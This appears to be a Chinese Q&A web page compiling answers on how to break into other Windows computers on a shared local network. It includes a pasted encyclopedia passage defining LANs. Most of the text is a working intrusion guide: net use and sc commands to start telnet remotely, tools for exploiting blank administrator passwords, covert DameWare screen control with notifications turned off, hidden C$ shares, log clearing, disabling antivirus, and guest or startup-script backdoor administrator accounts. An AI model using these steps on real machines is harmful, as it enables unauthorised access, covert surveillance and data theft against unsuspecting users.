如何入侵内网中的win7电脑，公用同一个

第一步：隐藏自已的位置

　　为了不在目的主机上留下自己的IP地址，防止被目的主机发现，老练的攻击者都会尽 量通过“跳板”或“肉鸡”展开攻击。所谓“肉鸡”通常是指，HACK实现通过后门程序控制 的傀儡主机，通过“肉鸡”开展的扫描及攻击，即便被发现也由于现场遗留环境的IP地址是 “肉鸡”的地址而很难追查。

第二步：寻找目标主机并分析目标主机

　　攻击者首先要寻找目标主机并分析目标主机。在Internet上能真正标识主机的是IP地 址，域名是为了便于记忆主机的IP地址而另起的名字，只要利用域名和IP地址就可以顺利地 找到目标主机。当然，知道了要攻击目标的位置还是远远不够的，还必须将主机的操作系统 类型及其所提供服务等资料作个全面的了解。此时，攻击者们会使用一些扫描器工具，以试 图获取目标主机运行的是哪种操作系统的哪个版本，系统有哪些帐户，开启了哪些服务，以 及服务程序的版本等资料，为入侵作好充分的准备。

第三步：获取帐号和密码，登录主机

　　攻击者要想入侵一台主机，首先要有该主机的一个帐号和密码，否则连登录都无法进 行。这样常迫使他们先设法盗窃帐户文件，进行破解，从中获取某用户的帐户和口令，再寻 觅合适时机以此身份进入主机。当然，利用某些工具或系统漏洞登录主机也是攻击者常用的 一种技法。

第四步：获得控制权

　　攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后，就会做两件事 ：清除记录和留下后门。他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程 操纵程序，以便日后可以不被觉察地再次进入系统。此外，为了避免目标主机发现，清除日 志、删除拷贝的文件等手段来隐藏自己的踪迹之后，攻击者就开始下一步的行动。

第五步：窃取网络资源和特权

　　攻击者找到攻击目标后，会继续下一步的攻击。如：下载敏感信息;窃取帐号密码、 个人资料等。

取得对方IP地址如XXXXXXXX，方；

判断对方上网的地点，开个DOS窗口键入TRA；

得到对方电脑的名称，开个DOS窗口键入NBT；第一行是对方电脑名称第二行是对方电脑所在工作组第；

在Windows目录下有一文件名为LMHOS；

开DOS窗口键入NBTSTAT-R6在开始

局域网（Local Area Network，LAN）是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真通信服务等功能。局域网是封闭型的，可以由办公室内的两台计算机组成，也可以由一个公司内的上千台计算机组成。

局域网（Local Area Network，LAN）是在一个局部的地理范围内（如一个学校、工厂和机关内），一般是方圆几千米以内，将各种计算机，外部设备和数据库等互相联接起来组成的计算机通信网。它可以通过数据通信网或专用数据电路，与远方的局域网、数据库或处理中心相连接，构成一个较大范围的信息处理系统。局域网可以实现文件管理、应用软件共享、打印机共享、扫描仪共享、工作组内的日程安排、电子邮件和传真通信服务等功能。局域网严格意义上是封闭型的。它可以由办公室内几台甚至上千上万台计算机组成。决定局域网的主要技术要素为：网络拓扑，传输介质与介质访问控制方法。

局域网由网络硬件（包括网络服务器、网络工作站、网络打印机、网卡、网络互联设备等）和网络传输介质，以及网络软件所组成。

中文名

局域网

外文名

LAN

范围

几千米以内

硬件

服务器、工作站、打印机、网卡

如果你懂dos命令的话，这个方法对你最有用了！

以下操作均在DOS命令行中执行;

1、net use \\对方IP\admin$

2、系统会提示你输入用户名和密码，输入他的用户名和密码后，回车，系统会提示“命令成功完成”

3、开启对方的telnet服务（可能已关闭，不用怕，可以开的）

sc \\对方IP config tlntsvr start= auto （auto前有空格，否则不能成功）

sc \\对方IP start tlntsvr

4、telnet到对方的计算机

telnet 对方IP （如 telnet 1721611）

5、输入用户名和密码（对方计算机的）

6、结束对方的迅雷进程

taskkill /F /IM thunderexe

注意：thunderexe就是迅雷的进程名，但是他使用的迅雷的进程名可能不是这个，如果你知道他的迅雷的进程名最好了，不过一般为thunderexe webthunderexe thunder5exe等，这几个你可以分别执行，确保万无一失，呵呵呵呵呵，同理，可以结束他的QQ，MSN，播放器等！恶搞的话，结束explorerexe，看效果！呵呵呵

先申明：

　　1入侵的范围只包括局域网，如果在学校上，可以入侵整个校园网;

　　2能入侵的只是存在弱口令(用户名为administrator等,密码为空)，并且开了端口，但没开防火墙的机子。

　　入侵工具：

　　一般要用到三个：NTscan扫描器，Recton--D贺免杀专用版，DameWare迷你中文版 45 (前两个工具杀毒软件都会报毒，建议将杀毒软件实时防毒暂时关掉，并将这两个软件的压缩包加密，防止被杀。)

　　入侵步骤：

　　1使用"NTscan扫描器"，在IP处填上要扫描的IP范围，选择"WMI扫描"方式，按"开始"后就等扫描结果了。

　　2使用"Recton--D贺免杀专用版"

　　选择"CMD命令"项，在"CMD:"中输入"net share C$=C:\"，即可开启远程主机的C盘共享，以此将"C"换成D,E,F等，即可开启D盘，E盘，F盘等的共享，这种共享方式隐蔽性很高，而且是完全共享，在对方主机上不会出现一只手托住盘的共享标志，然后在地址栏中输入"\\对方IP\C$"，即可进入对方C盘。

　　选择"Telnet"项，在"远程主机"中输入刚才扫描到的一个IP，远程启动Telnet服务，成功后在"CMD选项"中，执行命令："net share ipc$",接着执行："net share admin$",最后执行"net use \\\IPC$" /user：administrator"在处填入你入侵的主机IP。

　　3使用"DameWare迷你中文版 45"，安装后点"DameWare Mini Remote Control"，在"帮助"项中选择激活产品，输入注册信息，成功注册后，进入"远程连接"窗口，在"主机"处填入IP地址，点"设置"，在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选，在"用户选项"中去掉"启用用户选项菜单"。设置完成好后，就可点"连接"，在弹出的对话框中点"确定"后，成功后你就可以像操作自己机子一样控制别人电脑了，当然你也可以只选择监视对方屏幕。注意：如果不注册的话，在对方主机上会弹出一个对话框，暴露你的身份。

　　入侵步骤补充：

　　1在以上第2步中，远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。

　　2Recton-D贺免杀专用版还有其他功能，在"进程"项中，可以查看远程主机的进程，并可任意结束其中进程;在"共享"项中，可以创建共享，我常用的是创建C$,D$,E$,F$,共享路径分别对应C：\,D：\等，共享好后在地址栏中输入\\IP\C$,进入对方C盘，你就可以随意复制删除里面的东西了，而且这种共享对方机子盘符上不会显示共享图标，也就不会被发现，弄完后最好还是把共享给关掉。最后选"日志"，清除所有日志，不留痕迹。这个软件会被杀毒软件当作病毒杀掉，用它时须将实时防毒关掉。

　　3上面的共享可通过CMD(程序-附件-命令提示符)完成，首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后，开共享用net share命令，共享C$(即C盘)："net share C$=C：",共享system文件夹："net share c=c：\winnt\system32",共享IPC$用："net share IPC$"等,最后是关闭共享，关闭C盘共享："net share C$ /del"。

　　4为方便下次入侵，可以设置后门， 查看用户："net user",激活guest用户

　　"net user guest /active：yes",更改guest的密码为poco："net user guest poco",把guest的权限提升为管理员权限："net localgroup administrators guest /add"。

　　5telnet命令(DOS命令)很多，可去网上查找它的命令，常用的有：查看D盘文件：""dir d：\",查看C盘program file文件夹："dir c：\PROGRA~1\;",60秒倒记时关机："shutdown -s -t 60"

　　补充说明：

　　1net use错误原因解决：

　　(1)"发生系统错误 6。 登录失败： 未知的用户名或错误密码。"

　　在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接，是无法访问C$等管理共享的

　　(2)"发生系统错误 7。登陆失败：用户帐户。可能的原因包括不允许空密码，登陆时间，或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里，禁用"空密码用户只能进行控制台登陆"

　　(3)"//IP/c$"时提示找不到网络途径。在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性，进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS"

首先你要知道跟你同一个局域网的用户是否开启了防火墙或者禁止了同一局域网的共享和安全！如果对方禁用了共享，那你是进不去的，只有用歪门邪道进去了方法如下

一、 在该机创建一个批处理文件，内容如下：

net user admin /add

net localgroup administrators admin /add

将上述的批处理文件保存为 adminbat

注：上述批处理文件作用是创建一个名为 admin 的管理员帐户(密码为空)。

二、将此批处理文件作为Windows 的开机启动脚本。

1、在 运行 对话框中输入 gpeditmsc

2、定位到 计算机配置一>Windows设置一>脚本 (启动/关机), 双击右边窗口的 启动,在其中添加先前创建的 adminbat。

3、重新启动计算机(两次)，系统便有了一个名为admin 的管理员

上述操作在Windows 2000/XP中可行，但要保证帐户可以访问注册表,组策略(创建帐户的操作实际上也就是在注册表中添加相应的项和值),而Windows中的缺省的Guest/受限帐户并无此限制。

或许，我们并不需要用Guest帐户去创建一个管理员，但设想如果某个程序只有管理员可执行，是否也就可用上述的方法来实现呢？

小结:Windows系统默认对Guest/受限帐户的限制只是表面上的，作为一个有经验的系统管理员，要做的事情还很多，起码应该禁止受限用户访问/修改注册表,组策略等。

谢谢！